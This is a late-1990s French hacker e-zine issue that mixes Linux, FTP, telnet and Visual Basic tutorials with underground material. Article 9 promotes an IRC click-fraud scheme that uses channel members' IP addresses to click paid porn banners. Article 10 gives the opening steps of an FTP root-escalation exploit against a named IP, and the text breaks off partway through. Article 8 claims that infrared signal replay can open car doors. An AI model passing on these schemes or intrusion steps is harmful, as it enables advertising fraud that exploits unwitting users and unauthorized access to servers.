     "Les newbies d'aujourd'hui sont l'lite de demain"     
      __ ____ ______ __     ___ __ _____   __ _____ _____   
     |;              #3|   /           .| |             .|   
     |;:               .  /    _ ____ __| |;   ____ _    |    
     |,__ __      ___ _| /    /           |   |      |   |    
           |     |      /    /            .   |      |   |    
           |     |     |;   |             |   |___ __.   |    
           |     |     |:   \___ ____     |              |    
           |:    |     |.            \    |;    _ __     .   
           |;    |      \__ __ _      |   |:   /    \    |    
           |     |              |.   /    .   |      |   |  
           |    .|             /    /     |   |      .   |  
    _  __ /__ ____\ __ _ _____/    /     /    |      |   |  
                                  /     /.    |      |   |   
     _ _ _ ___ _____ __ ____ ____/     /___ __|      |___|


                                                               
**************************************************************
*  -=THE SHADOWS ARMY=-                                      * 
*                                                            * 
*  Tout ce que vous pourrez lire dans ce zine est  un but   *
*  ducatif seulement. Si vous causez des dommages  ou que   *
*  vous vous faites pogner c'est de votre faute.             *
*                                                            *
*  URL : http://tsarmy.cjb.net                               *
*  E-MAIL : tsarmy@hotmail.com                               *
*  IRC : Undernet - #TSARMY                                  *
**************************************************************


Disclaimer:
-----------
Bienvenue dans ce nouveau numro. C'est dur de sortir un
e-zine en ce moment vu la concurence, mais qui  ne tente 
rien n'as rien, alors on se lance, meme si ds le dpart 
on a pas beaucoup  de  chance. Bon, je vous souhaite une 
bonne  lecture  tous et j'espre  que  vous  aimerez ce 
numero.


Table des Matires:
-------------------
1. Les partitions et linux                    - |-OnYx-|
2. Les attitudes d'un hacker                  - DECdeamon
3. Commandes Telnet                           - |-OnYx-|
4. Comment compiler son noyau en linux        - |-OnYx-|
5. Configuration d'un modem rapide sous linux - |-OnYx-|
6. Tutorial sur le Visual Basic               - MaRsHaLL
7. Les Commandes FTP                          - |-OnYx-|
8. Piratez son magntoscope                   - Inconnu
9. Comment faire de l'argent facile           - [Jideel]
10. Comment passer root avec FTP              - {Sliver}
11. Hacker son windows NT                     - putois
12. Hacker son windows NT #2                  - putois
13. Fin du #3                                 - TSARMY



************************************************************
=-=-=-=-=-=-=-= 1. Les partitions et Linux =-=-=-=-=-=-=-=-=
************************************************************


Une partition c'est quoi?

Lorsque  vous  achetez un nouveau disque  dur, celui-ci  est
totalement vide.Pour l'utiliser, il va falloir le partition-
ner.  Partitionner,  c'est  dcouper  le  disque  en  une ou 
plusieurs parties,  afin qu'il  soit  reconnu par le systme 
d'exploitation utilis.  Une  partition est donc une tranche
du disque dur qui,  une  fois formate,  pourra contenir les 
donnes du systme d'exploitation et de l'utilisateur.

Pour partitionner un disque dur, il faut un utilitaire. Pour
Linux, deux utilitaires  se  dmarquent, fdisk et le nouveau 
Disk Druid.

Pour l'instant je vais vous expliquer les noms des partition
sous DOS et sous Linux, afin de  bien saisir les diffrences
entre les deux systmes.

Les partitions sous DOS :
-------------------------
Sous DOS,  que  l'on  possde  un disque dur IDE ou SCSI, on
trouvera  les  memes  noms.  DOS  ne  peut  grer  que  deux 
partitions: une "primaire"  et une "secondaire". C'est cette 
dernire  que  l'on  divisera  en lecteurs logiques. Si vous 
n'utiliser  qu'un  seul  disque dur,  les noms de partitions 
sont de toutes faons comme ca :

La premire partition, dite "partition primaire",  deviendra 
C: La seconde, dite "partition secondaire", sera celle  dans 
laquelle  vous  spcifierez  un  ou  des  lecteurs  logiques 
(D: E: etc.).

Les partitions sous Linux :
---------------------------
Pour dfinir  les  partitions,  le systme Linux utilise une 
combinaison de lettres et de chiffres  (hda1,hdb2,sda4,sdc2,
etc.) qui peut paratre confus pour les nouveaux utilisateurs.

Les deux premires lettres indiquent le type de priphrique 
sur lequel est installe la partition. Pour les disques durs
IDE, on utilise "hd" pour les disques durs SCSI,  on utilise 
"sd".

La lettre suivante  indique  le priphrique sur  lequel est 
installe la partition. Pour une partition installe sur  le 
premier disque dur IDE on utilise /dev/hda (/dev/hdb pour le 
second disque, etc.). Pour  une  partition  installe sur le 
premier disque dur SCSI, on utilise /dev/sda (/dev/sdb  pour
le second disque, etc.).

Le  chiffre  dfinit  la  partition.  Les  quatre  premires 
partitions (primaire et tendues) sont numrotes  de 1  4. 
Les  partitions  logiques  sont  numrotes    partir de 5. 
Exemple,  pour  la troisime partition (primaire ou tendue) 
du premier disque dur IDE, on utilise /dev/hda3.

Exemples :
----------
hda1 pour la premire partition du premier disque dur IDE
hda2 pour la deuxime partition du premier disque dur IDE
hdb1 pour la premire partition du deuxime disque dur IDE
sda4 pour la quatrime partition du premier disque dur SCSI

                                      |-OnYx-|


============================================================
"A force de vouloir nous censurer on va finir par croire que 
nos propos risquent d'atteindre leurs buts."
============================================================


************************************************************
=-=-=-=-=-=-=- 2. Les attitudes d'un hacker =-=-=-=-=-=-=-=-
************************************************************

      Il me semble que les hackers devraient tous se  
serrer  les  coudes... et  il  me semble  que  c'est 
cette attitude qui manque le plus dans l'underground 
autant  francophone  qu'anglophone.  Tous  devraient 
s'aider  et partager leurs connaissances et ralisa-
tions  avec les  autres.  Un problme  que  je  vois 
souvent,  ce  sont  les  hackers  (de n'importe quel 
niveau d'exprience... du vrai lite au wannabe) qui 
se pensent les meilleurs et que  rien ni personne ne 
peut les surpasser. Je suis phreaker, et les gens me 
reconnaissent comme  tel mais j'avoue que je ne suis 
pas le meilleur,  et  pas  si  bon  que ca. J'ai des 
qualits  et  des  dfauts,  comme  tout  le  monde. 
Prenons  l'exemple des warlordz  (WaR^L0rDz sent toi 
pas vis!): |-OnYx-| a un jour mensionn un  site ou 
quelques  hackers  qui  se donnaient l'applation de 
warlordz. Peut-tre sont-ils vraiment  bons, mais de 
rpter  sur  chacune  de leurs HTML qu'ils sont des 
lites,  qu'ils   sont  les  meilleurs  et  que  les 
lecteurs  de   leur  site  sont   des  imbciles  et 
ignorants, c'est xagr et   mon  avis cela prouve 
qu'ils ne  sont  pas  de vrai hackers. Ne devrait-on 
pas  tre   discrets  et  modestes,  s'entraider  et 
participer    la continuit d'Internet, qui devrait 
tre   un   outil   d'apprentissage  pour  tous,  de 
recherche   d'information,  de  communication  et de 
consolidation  de  la solidarit humaine, plutt que 
d'tre  un  lieu  dangereux ou le moindre risque est 
fatal?  Les  vrais  hackers  ne dtruisent pas, mais 
rendent l'Internet  un  monde  plus viable... Ils en 
sont les vrais artisans.

Vous pouvez en juger par vous-mmes: 

http://www.famipow.com/warlordz/

                                 DECdeamon


************************************************************
=-=-=-=-=-=-=-=-=-=- 3. Commandes Telnet =-=-=-=-=-=-=-=-=-=
************************************************************

Voil un petit rsum des commandes telnet.

Commande        Description
--------        -----------
close           Termine la connexion en cours.
logout          Termine la session telnet.
display         Affiche l'occupation du clavier.
mode            Commute entre mode lignes et mode
                caractres; saisissez "line" ou "caracter".
open "hte"     Etablit une connexion avec l'hte donn.
quit            Termine la connexion et la session telnet.
send            Transmet des caractres spciaux.
set             Fixe les paramtres d'exploitation.
unset           Supprime les paramtres d'exploitation.
status          Affiche des informations d'tat concernant
                la session telnet en cours.
toggle          Commute entre les paramtres d'exploitation.
sic             Affiche l'tat des caractres spciaux.
z               Fait passer la session telnet en cours  
                l'arrire plan. Pour la faire revenir au
                premier plan, saisissez la commande "fg".
!               Appelle un sous-shell.
environ         Modifie l'occupation des variables 
                d'environnement.
?               Affiche un texte d'aide.

                                 |-OnYx-|


============================================================
"Le vrai hacker est celui qui sait reconnaitre la limite de 
ses connaissances"
============================================================


************************************************************
=-=--=-=- 4. Comment compiler son noyau en linux =-=-=-=-=-=
************************************************************

Configuration:
--------------
Bon, pour commencer la configuration, passez 
dans le rpertoire : /usr/src/linux
Ensuite pour excuter la configuration par "config"
crivez: make config
Pour le faire par "menuconfig" crivez: make menuconfig
A la fin, tous les paramtres saisis sont rangs dans le
fichier .config qui commande la suite du droulement.

Compilation:
------------
Le plus gros du travail est deja fait, le reste c'est
l'assistant qui s'en charge en suivant vos instructions.
L'tape suivante prend en considration les 
drivers: make dep
Ensuite le mnage doit tre fait: les fichiers temporaires
laisss par chaque processus de compilation sont effac
du disque dur par la commande: make clean
Ces 2 tapes rapide sont suivi de 2 plus longues:
la compilation: make
Et ensuite la liaison: make zImage 
Ce processus prend du temps, environ 30 minutes sur
un 486  50Mhz et 10 minutes sur un Pentium 100.

Pour finir:
-----------
Aprs une compilation russie, le nouveau noyau "zImage"
est rang dans le rpertoire /usr/scr/linux/arch/i386/boot
Par scurit, car rien ne prouve que le nouveau noyau va 
bien marcher, renommer d'abord l'ancien noyau. 
Pour finir si vous avez choisi le dmarrage par 
LILO, vous devrez renommer le noyau "vmlinuz".
Bon voil c'est tout, il y a plusieurs mthodes mais 
celle-la devrais bien marcher.

                                 |-OnYx-|


************************************************************
=-=-=- 5. Configuration d'un modem rapide sous linux =-=-=-=
************************************************************

Linux  limite  normalement les ports serie  
un de dbit 38400 bauds (setup, le programme
de configuration,  demande  le dbit maximal
du modem, la  valeur la plus leve possible
est 38400). Si  vous  disposez  d'un   modem
plus  rapide,  il  faut utiliser la commande
"setserial". Celle-ci  permet  de configurer
un  modem  38400  pour  qu'il  fonctionne  
57600 bauds, comme ceci: 

  setserial /dev/cua2 spd_hi

Remplacer /dev/cua2 par le nom du  modem que 
vous configurez. La commande:

  setserial /dev/modem spd_vhi

permet d'utiliser  le  modem  115200 bauds.
Ces  2  options  peuvent  tre  faite par un
utilisateur normal (autre que root). 
La commande:

  setserial /dev/modem spd_normal

permet de configurer le port srie   un son 
dbit  normal  de  38400  bauds. La commande 
"setserial" fonctionne  avec tous les noyaux 
de Linux  partir de la version 1.0.

                           |-OnYx-|

============================================================
"Si vous chercher un e-zine francais, vous le trouverez
surement sur http://members.xoom.com/lesarchives"
============================================================

************************************************************
=-=-=-=-=-= 6. Tutorial sur le Visual Basic =-=-=-=-=-=-=-=-
************************************************************

Dans ce tutorial, je  vais  vous faire apprendre la base 
de Visual Basic. Je vais commencer par vous familiariser 
dans ce programme.  Sr que vous  ne serez pas un expert 
du Visual Basic aprs avoir lu et comprit ce texte, mais 
vous  aller  acqurir  une  base.  Je  vais  vous  faire 
comprendre  le  logiciel  et ces  composant. Nous allons 
faire quelques programmes, comme exemple pour apprendre.
Vous  aller  peut-tre  dire  que  c'est  compliquer  et 
fastidieux ce  language, mais c'est  un  language  asser 
simple a comparer certain langage  que je  trouve un peu 
mlant. Je vais essayer de faire de mon  mieux pour vous 
expliquer le langage,  mais c'est ma premire exprience 
pour un toturial. J'aimerais avoir de vos commentaires  
propos  de  ce  texte  donc,  j'espre  bien, vous aurez 
apprit quelque chose de Visual Basic. 

Installation  de  Visual  Basic:  Dans ce paragraphe, je 
vous  montrerai  comment bien installer Visual Basic, si 
ce n'ont pas dj fait.  Quand vous installer, vous avez 
choix de  trois  possibilits, Typique : la version avec 
tout les composantes. Personnalis :  pour les personnes 
avec  plus  de  connaissance sur Visual Basic, car, vous 
pourriez ne pas  mettre des choses donc vous aurez grand 
besoin.   Compresser:  version   donc  je  vous  conseil 
vraiment  pas si  vous avez un ordinateur performant, si 
vous avez  un  ordinateur pas trs fort comme un 486, je 
vous conseille la version compresser. Vous pouvez, aprs 
l'installation   aller  ajouter  des composant du Visual 
Basic,  en  allant tout simplement dans le dossier Setup 
de \devstudio\VB\Setup\Setup.exe .  Rfr  cette place 
(Setup) pour aller rinstaller le programme.

Configuration de L'environnement : Vous avez le choix de 
mettre votre programme Visual Basic en format MDI ou SDI. 
SDI : Single  Document Interface, ce format est comme le 
Visual Basic 4. MDI : Multiple Document  Interface. Pour 
aller changer ce format, vous aller tout simplement dans 
la commande Outils/Options et aller  tendu,  et cocher 
ou dcocher  la case Environnement de dveloppement SDI. 
Ceci est  a  votre  dsir. Moi je trouve personnellement 
que l'environnement  MDI  est  mieux que l'environnement 
SDI.

Dmarrage de Visual Basic : Comme vous voyez, nous avons 
plusieurs  type  de  cration pour Visual Basic. Je vais 
vous montrer ce  que signifie tout ces type de cration.

Exe   standard:  Quand  vous  slectionner  ce  type  de 
projet,  vous  avez  un  seul fichier de feuille. Par le 
menu Projet, vous pouvez aller ajouter d'autre feuilles, 
module et modules de classes.  Les modules  de classe ne 
sont  cependant  utilisables  que  localement pour cette 
application  prcise.  Si  les classes sont publique, en 
dehors  ce  projet,  vous  devez choisir EXE ActiveX. Le 
type exe  standard est  le  type  que  j'utilise pour la 
plupart des exemples.

Exe ActiveX:  avec  ce  type  de projet, c'est un projet 
comportant  un  seul module de classe que est ouvert. Le 
module  de  classe  prdfini  est  dclar  comme tant 
public par l'intermdiaire de la proprit Instancing et 
la valeur 5 - MultiUse  qui  lui ai affecte. Il est par 
consquent accessible galement en dehors  du projet. En 
comparaison avec les types de projet  de Visual Basic 4, 
un  EXE  ActiveX  n'est  rien  d'autre  qu'un  EXE  OLE, 
autrement  dit  un s erveur Out Process. On a en quelque 
sorte  adapt  le  nom   l'air du temps. En gnral, on 
complte  un  EXE  ActiveX, toujours par le menu Projet, 
avec  des  feuilles,  des  modules et ventuellement des 
modules  de  classe  supplmentaire. Les classes ne sont
cependant  pas  obligatoirement  publiques.  Vous pouvez 
aussi dcider de rserver  les modules de classe suppl-
mentaires au seul projet en cours. Par dfinition, aucun 
objet  spcifique  n'est  dsign  pour  l'excution  du 
programme dans un EXE ActiveX, mais en gnral  c'est la
routine Sub Main, qui est dfinie dans un module de code 
source, qui fait office d'objet de dmarrage. L'objet de 
dmarrage est  dfini dans  l'onglet Gnral de la bote 
de dialogue Proprits du projet.

DLL ActiveX: un DLL ActiveX est un DLL OLE qui s'excute 
en  tant  que  server  In  Process  dans la mme zone de 
mmoire que l'application utilisant cette DLL. Le projet 
se prsente de la mme manire qu'un  EXE ActiveX, si ce 
n'est  que  son  type est diffrent. Un module de classe 
public  est  cre  que l'on peut complter avec d'autres 
fichiers de projet en cas de besoin. Dans un DLL ActiveX, 
L'excution  du  programme  dmarre  galement  dans  la 
routine Sub Main.

Contrle ActiveX:  Visual  basic  5 permet de programmer 
des contrles en syntaxe  Visual Basic.  Lorsque ce type 
de  projet  est  slectionn, un fichier de contrle est 
automatiquement cre. Il contiendra le code du contrle. 
A  l'instar  d'un fichier  de  feuille,  un  fichier  de 
contrle se compose d'une zone de conception visuelle et 
du code source associ. Si ncessaire, ce type de projet 
peut galement tre complt par des modules, modules de
classe et feuilles supplmentaires. Il n'y a pas d'objet 
de dmarrage spcifique pour un projet de contrle.

Assistant  Cration  d'application:  derrire ce type de 
projet se cache un assistant  l'aide duquel vous pouvez 
dfinir  de  manire  interactive  une structure de base 
pour  une  nouvelle  application.  Il  vous  propose par 
exemple de choisir votre programme en format MDI ou SDI. 
Il  cre  votre  programme a partir de vos dcisions sur 
les question demand au dbut.  Vous  avez  une srie de 
questions    rpondre,  des  question a propos de votre 
choix  de  votre  interface,  les  pages de votre choix, 
comme ex, une page de (  propos ). Il  vous suffi juste 
de  complt  le  code  source  apres  avoir remplit les
questions  pour  votre  programme,  plus rapide, mais ce 
n'est pas toujours comme on le souhaite vraiment.

Contrle  de  VB  dition  Professionnelle  ce  type  de 
projet correspond au type EXE  standard  si ce n'est que 
les  contrles  supplmentaires de l'dition profession-
nelle de Visual Basic 5, dans la bote a outils.

Complment:  Vou s slectionnez  ce  type si vous voulez 
programmer  un  Add-In.  C'est  dire un complment pour 
l'environnement   de   dveloppement  Visual  Basic.  Un 
fichier  feuille,  un  module  de  code  et un module de 
classe   sont   automatiquement   gnrs.   Toutes  les 
instruction  ncessaires  pour  attacher le complment  
l'environnement  de  dveloppement  et pour l'en sparer 
 nouveau sont dj contenues dans le code  source. Vous 
devez  encore  indiquer  un  nom  d'application. Pour le 
reste, un Add-In correspondra au type de EXE ActiveX.

DLL Document ActiveX / EXE Document ActiveX: un document 
ActiveX  est  un  document  Visual  basic  pouvant  tre 
affich  dans  un  conteneur  ActiveX,  par exemple dans
Internet Explorer. Pour l'affichage,  il faut un serveur 
Visual  Basic,  ncessairement  sous  forme de composant 
ActiveX (EXE ou DLL). Le  contrle  OLE  peut  pas  tre 
utilis dans les documents ActiveX.

Un peu aprs:  Normalement vous avez choisi EXE standard 
ou  Contrles  de  VB  dition  Professionnelle, c'est  
votre choix,  vous  voyez une image comme plus bas. Ceci
s'appelle  une  Form. C'est votre fentre principal pour 
faire  votre  programme.  Vous avez srement deviner que 
vous pouvez agrandir c ette  fentre manuellement. C'est 
dans ceci que vous  installer vos contrle a votre choix 
pour votre programme.

Pour  cette  fois-ci, j'ai pas beaucoup d'ides pour des 
exemples... ON  va  faire  un  programme qui se sert des 
MsgBox (petite boite a message)... Vous aller  peut-tre 
dire  que  c'est nul,  mais l,  je pense  pas que tu va 
faire des programmes de fou pour commencer ;) Bon...  La 
vous aller avoir besoin de l'image que je vous ai donner 
pour votre programme car la plupart des informations son 
dedans.

[ Pour l'image ]

-Pour aller changer  l'apparence du bouton (texte sur le 
 bouton), cette  proprit s'appelle Caption, et changer 
 le nom est "Name"... asser simple.
-Pour  changer  le texte cris sur  les Labels ( pour du 
 texte ), ben c'est la proprit "Caption".
-Pour changer la grosseur et la police du texte, il faut 
 aller dans "Font"
-Pour ajuster automatiquement la grosseur des Label avec 
 le texte, vous pouvez tout simplement  aller changer la 
 proprit "Autosize" pour "True"

 (exemple.jpg est attach avec ce e-zine)

---------------------------------------------------------

Bon, on va rentrer le code du programme. Vous cliquer 
2 fois  sur  le  bouton  Afficher et taper ceci entre 
Private Sub Afficher_Click() et End Sub.

[ Code ]

Private Sub Afficher_Click()
    If (pigra.Value = True) Then
        MsgBox "PiGrA", 0, "Exemple 1"
    End If
    If (hello.Value = True) Then
        MsgBox "HeLLo", 0, "Exemple 2"
    End If
End Sub

---------------------------------------------------------

C'est  juste  ce  code que vous aller marquer, mais, je 
vais  faire  mon possible pour vous faire comprendre le 
code.  Premirement  le  If (****.Value = True),   cela 
signifie  que  si la case est cocher alors... (then) Le 
".value" c'est sa qui designe si il est cocher (valeur, 
cocher  ou  non)  MsgBox "****", 0,"***" :  c'est  tout 
simplement la declaration de la boite a message (msgbox)
"****", 0,"***" :  au  debut,  c'est  le  texte dans la 
boite, le "0", c est la forme de la boite,  vous pouvez 
changer  le  numero et vous aller voir les changements, 
et le texte apres,  c'est le titre du MsgBox. Le End If 
dclare  la  fin  du  If (pigra,value).  Si  vous faite 
l'exemple,  vous  aller  comprendre.  Apres  vous aller 
marquer  le  code suivant, cliquer 2 fois sur le bouton
"Quit" et marquer tout simplement "end" (ne marquer pas 
les 2 ""). Le End signifie de sortir  du programme tout 
simplement.

Bon, l j'ai fait mon possible et c'est mon  premier
article, alors ne soyer  pas trop mchant envers mon 
article,  je  sais  que  sa donne pas grand chose ce 
programme, mais c'est la connaissance des contrles.

                      MaRsHaLL

                      E-Mail: microt@globetrotter.qc.ca

============================================================
"Respectez les autres dans ce qu'ils font si vous ne faites
pas mieux vous-mmes"
============================================================

************************************************************
=-=-=-=-=-=-=-=-= 7. Les Commandes FTP =-=-=-=-=-=-=-=-=-=-=
************************************************************

Sur tout systme Unix, un client FTP permet d'utiliser 
le protocole FTP (File Transfer Protocol),  la ligne 
de commande. Voil un rsum de toutes les commandes 
disponible.

Commande:                  Description:
---------                  ------------
Commandes de Bases
------------------
?                        Donne une vue d'ensemble
                         des commandes disponibles.
? commande               Donne un bref descriptif
                         de la commande donne.
!                        Excute un sous-shell sur
                         l'ordinateur local.
! commande               Excute la commande donne,
                         dans un sous-shell sur
                         l'ordinateur local.
bye                      Termine la session en cours.
help                     Identique  ?
quit                     Identique  Bye.

Commandes de Connexion
----------------------
account [mot_de_passe]   Transmet le mot de pass nces-
                         saire  l'ordinateur distant.
open [hte]              Ouvre une session sur l'ordinateur
                         distant, donn par l'hte.
close                    Termine la connexion FTP courante
                         sans quitter le programme.
disconnect               Identique  close.
user [nomutilisateur     Modifie le nom utilisateur au
[mot_de_passe]]          cours de la session FTP.

Commandes concernant les Rpertoires
------------------------------------
cd [rpertoire]          Passe dans le rpertoire donn.
                         La saisie de la commande sans 
                         argument ne fait pas revenir au
                         rpertoire racine comme au niveau
                         du shell, mais provoque la demande
                         du rpertoire cible.
cdup                     Fait passer au rpertoire parent
                         (correspond  cd..).
delete [nom_fichier      Supprime le fichier donn sur
_distant]                l'ordinateur distant.
dir [rpertoire]         Affiche le contenu du rpertoire
                         donn.
ls [rpertoire]          Affiche le contenu du rpertoire 
                         courant ou du rpertoire spcifi
                         sur l'ordinateur local.
mkdir [rpertoire]       Cre un rpertoire sur l'ordinateur
                         distant. Si aucun rpertoire n'est
                         spcifi, oblige  rpter la
                         commande.
pwd                      Affiche le nom du rpertoire distant
                         courant.
mdir [rpertoire]        Supprime le rperoire distant donn.
                         Si aucun rpertoire n'est spcifi,
                         la commande oblige  le prciser.
Commandes de transfert
----------------------
append [fichier_local]   Ajoute le contenu du fichier local
[fichier_distant]         un fichier distant.
cr                       Active ou dsactive le filtre de
                         retour chariot. Le filtre est activ
                         par dfaut.
get [nomfic.anc          Transmet un fichier d'un ordinateur
nomfic.nouv]             distant  l'ordinateur local. Si
                         aucun nom n'est spcifi, la commande
                         exige de nouveau la saisie. Lorsque
                         nomfic.anc et nomfic.nouv sont donns,
                         le fichier nomfic.anc est renomm
                         nomfic.nouv sur l'ordinateur local.
mget [liste_fichiers]    Transmet les fichiers spcifis dans
                         liste_fichiers  l'ordinateurs local.
                         Il faut confirmer sparement la 
                         transmission de chaque fichier si 
                         l'option -i n'as pas t utilise.
mput [liste_fichiers]    Transmet les fichiers spcifis dans
                         la liste_fichiers de l'ordinateur
                         local  l'ordinateur distant. Il faut
                         confirmer sparement la transmission
                         de chaque fichier si l'option -i n'a
                         pas t utilise.
put [nomfic.anc          Transmet un fichier de l'ordinateur
nomfic.nouv]             local  l'ordinateur distant. Si le 
                         nom n'est pas spcifi, la commande
                         exige de nouveau la saisie. Lorsque 
                         les noms de fichier nomfic.anc et
                         nomfic.nouv sont donns, le fichier
                         est renomm sur l'ordinateur distant.

Commandes de configuration d'options
------------------------------------
ascii                    Permet le transfert de fichier en mode
                         ASCII. Attention: ne tranmettez que des
                         fichiers textes dans ce mode! Utilisez
                         le monde binaire pour les autres
                         fichiers (voir ci-dessous).
bell                     Gnre un son aprs chaque commande sur
                         la console locale.
bin                      Permet le transfert de fichier binaire.
                         Ce monde est ncessaire pour les
                         fichiers image et les fichiers de
                         programmes; avec le mode ASCII, vous ne
                         pourriez plus ni excuter les fichiers
                         ni les ouvrir.
binary                   Identique  bin
hash                     Provoque l'affichage d'un dise (#)
                         aprs chaque transfert de bloc de 
                         1 Koctet. Cet affichage permet de suivre 
                         la progression d'un transfert.
prompt                   Active ou dsactive le prompt interactif
status                   Affiche les paramtres courants du
                         programme FTP.

                                 |-OnYx-|

============================================================
"News sur l'Underground Qubecois: www.unqc.cx"
============================================================

************************************************************
=-=-=-=-=-=-=- 8. Piratez son magntoscope =-=-=-=-=-=-=-=-=
************************************************************

Les commandes  distance de magntoscope,
de  tlvision, mais aussi ouverture  
distance des portes de certaines voitures
sont bases sur une liaison infrarouge.
Pour quelque francs (FF), vous pouvez
munir votre PC d'une telle liaison et lui
permettre de piloter tous ces appareils.
Mme les voitures!

Une liaison infrarouge est un rayonnement
lectromagntique (source lumineuse) de
longueur d'onde comprise entre 0.8 m et 
1 mm, donc invisible  l'oeil nu. L'mmeuteur
de votre tlcommande possde deux tats:
allum ou teint. Lorsque vous appuyez sur
le bouton, vous dclenchez une suite d'clats
qui sont perus par le rcepteur et ensuite
interprts. La faon d'interpreter cette 
suite est en fonction de la mthode d'encodage
utilise. Et elles sont nombreuses ces
mthodes d'encodage, presque autant que les 
constructeurs de tlvision! Examinons un
systme courant, le RC5.

RC5
---
Le RC5 pour Remote Control version 5 a t
mis au point par Philips. C'est un vrai 
protocole d'change. Il fait correspondre
 chaque commande une trame, une serie de
bits envoys dans le temps. En informatique,
un bit est dfini par une valeur lectrique
par rapport  un niveau zro. Pour se protger
de ces interfrences, le codage d'un bit en RC5
est une variation du signal. Un signal montant
est interprt descendant comme un 1, un signal
descendant comme un zro. Une trame RC5 est 
constitue de 14 bits:  

S1 S2 C  A4 A3 A2 A1
A0 B5 B4 B3 B2 B1 B0

Les deux bits de Start, S1 S2, reveillent le
rcepteur. Le bit de commande, C, alterne entre
la valeur 0 et 1 pour diffrencier un appui
continu sur une touche. Le rcepteur doit 
distinguer l'appui continu sur l'augmentation
du volume (o il doit continuer  effectuer la
commande) et un doigt qui reste malencontreusement
sur la touche de la chaine 1! A4  A0 sont les 
5 bits d'adresse. Ils permettent donc de commander 
25, soit 32 systmes diffrent: tlvision,
magntoscope, chane hi-fi, etc. Les six bits de
commande, B5  B0, dterminent 64 fonctions 
diffrente pour chaque systmes! Un total de 2048
combinaisons. Pour viter une anarchie certaine,
un comit a attribu une valeur pour chaque
systme et pour chaque commande. Par exemple,
un magntoscope couleurs a l'adresse 5, soit les
bits d'adresse 00101. A la touche "Eject", 
correspondent les bits de commande: 101101.
Lorsque vous appuyez sur ce bouton de votre
tlcommande, la trame suivante est mise vers
votre magntoscope: 11000101101101. L'envoi
d'un bit dure 1,778 ms, la dure d'une trame
est donc de 24,89 ms. Assez rapide pour zapper
plus vite que l'clair!

J'Capte Rien!
-------------
Tout cela est bien compiliqu et, finalement,
bien inutile! Au lieu d'essayer de comprendre
et de recrer ces mthodes d'encodage, nous
avons dj une source d'mission de ces 
faisceaux: notre tlcommande! Elle produit
directement les faisceaux lumineux  mettre
pour chacune de ses fonctions. Il suffit de 
fabriquer un rcepteur pour capter et enregister
les faisceaux lis  chaque fonction. Il suffira
de reproduire  l'identique ce mme faisceau par
l'intermdaire d'un metteur pour lancer la
fonction attache  ce bouton. Bien sr, il
faudra, les uns aprs les autres, stocker les
signaux pour chaque bouton. Mais une fois
cette apprentissage effectu, votre PC 
remplacera compltement votre tlcommande.
Il pourra commander de faon beaucoup plus
souple, et en une simple touche, la mise en
route de votre tlvision ou de votre 
magntoscope, le rembobinage de la casette et
la mise en lecture. Et l'ouverture des portes
de votre voiture! Mieux, grce  un peu de 
programmation, on pourra rassembler en un seul
clic plusieurs commandes, les programmer dans
le temps et mme les automatiser avec le 
lancement d'autres applications!

Le Montage:
-----------
Le plan du montage (montage.jpg) est joint 
avec ce e-zine.

Le montage comporte 2 parties: rcepteur et
metteur. Le rcepteur est constitu d'un
phototransistor infrarouge pour recevoir et
et apprendre les signaux mis par votre
tlcommande classique. L'metteur est une
LED infrarouge que votre PC allumera et
teindra pour reproduire  l'identique les
signaux appris. Ces deux circuit seront
interfacs  votre PC par l'intermdiaire
de la prise parallle. Chez votre dtaillant
de composants lectroniques, il vous faudra 
environ 20 FF, un phototransitor infrarouge,
une pile 9 volts pour l'alimentation, une 
prise Parallle mle, trois rsistances,
une de 100 Kohms, une de 100 ohms et une
troisime de 10 ohms, ainsi qu'un 
transistor de type BC 547. A noter que vous
pouvez galement trouver par correspondance
ou dans des magasins spcialis des
photomodule ddis  la rception infrarouge.
Ils ne reoivent que les ondes infrarouges,
comportent un pramplificateur de signal et
un oscillateur  38 kHz pour filtrer 
exactement les trames RC5. Vous aurez de 
bien meilleurs rsultats avec ce composant 
trs utilis dans les tlcommandes du
commerce. Une rfrence chez Temic: TSOP1738

Vous trouverez des programmes pour simuler
une tlcommande: http://www.ziplabel.com

============================================================
"En passant, je fais une petite pub pour le site de maniak
qui est trs bien fait: www.maniak.net"
============================================================

************************************************************
=-=-=-=-=- 9. Comment faire de l'argent facile -=-=-=-=-=-=-
************************************************************

De largent facile ca vous tente? /j #stonecash
En effet sur ce chan on peut faire de l'argent 
facilement et presque lgalement, vous connaisser 
les bannires XXX ou autres? Ces bannires vous 
permette de faire 8 cent  25cent par clic,
comme vous savez, plus il y a de monde qui clic 
dessus plus il y a d'argent qui rentre, le 
problme se situe pour trouver ces personnes qui
vont cliquer sur ces bannires, il y a bien 
vidasment le spam pub sur IRC mais cela ne 
fonctionne presque plus maintenant que tout le
monde sait que ce sont ces adresses :
<Nounoune> Salut, [Tawouin] tu veux voir 
mes photos nus... http://207.36.86.84/babes/
alors un gars a eu la merveilleuse ide de
programmer un script qui clic pour nous
sur nos bannires!

Il utilise les IP des personnes qui sont 
sur le channel #stonecash pour cliquer sur 
les bannires et tous ca se fait automatiquement!
vous n'avez qu'a venir sur le channel et downloader 
les .mrc de C3rv3au en marquant /ctcp C3rv3au script
et suivre la dmarche qui va aparatre en priver et 
voila! Tout ce qui vous reste  faire c'est de vous 
abonner  des sites porno ou autre, grce  une 
commande comme: 
!privategold Jideel http://members.xoom.com/mfluder/ 
que vous passerez  toutes les 5 min sur le channel 
tlm va cliquer sur votre bannire.

Vous pouvez trouver des bannires  www.mostcash.com,
www.rawcash.com et  plusieurs autre place bien sur, 
cependant mostcach on ne sait pas si il envoie des chques
encore parce que c'est nouveau cette adresse mais rawcash 
en envoie eux.

Pour de plus amples informations par rapport  la commande 
sur le channel /msg c3rv3au jai pas tout comprit le 
fonctionnement de sa commande mais ca va venir...

Donc je vous invite  joindre #stonecash puisque 
plus ya de monde plus il y a de l'argent qui rentre et 
rapellez-vous que c'est US en plus largent.

                               [Jideel]

============================================================
Un nouveau site de News Underground Francophone est entrain
de se dvelopper. Sur ce site, il y aura des commentaires
et critiques sur les diffrents groupes Underground 
Qubcois, et bien sur des News. 

Visitez PADNews: http://www.citeweb.net/geeknews/
============================================================

************************************************************
=-=-=-=-=-=- 10. Comment passer root avec FTP =-=-=-=-=-=-=-
************************************************************

Bon, c'est un vieux exploit, mais il marche
toujours sur certains FTP,  vous d'essayer.

Tout d'abord, vous cliquez sur :

Dmarrer
Excuter
puis vous tappez: ftp -n

L une fentre va s'ouvrir avec la prompt:

ftp>

L vous marquez "open" suivi du nom 
du site genre:

ftp>open 194.154.198.36
*Message

Lorsque vous serez connect, tapez:

QUOTE user ftp

*Username accept, enter password

Tapez ceci par la suite:

